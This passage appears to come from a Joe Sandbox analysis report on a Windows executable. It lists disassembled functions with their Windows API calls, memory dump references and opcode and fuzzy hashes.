                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$LabelVolume
                                                • String ID: \VH
                                                • API String ID: 2006950084-234962358
                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetMenuItemInfoW.USER32 ref: 00449727
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                • DrawMenuBar.USER32 ref: 00449761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw_malloc
                                                • String ID: 0
                                                • API String ID: 772068139-4108050209
                                                • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcscpy
                                                • String ID: 3, 3, 8, 1
                                                • API String ID: 3469035223-357260408
                                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                • API String ID: 2574300362-3530519716
                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                • API String ID: 2574300362-275556492
                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                • API String ID: 2574300362-58917771
                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                • __itow.LIBCMT ref: 004699CD
                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                • __itow.LIBCMT ref: 00469A97
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 004503C8
                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
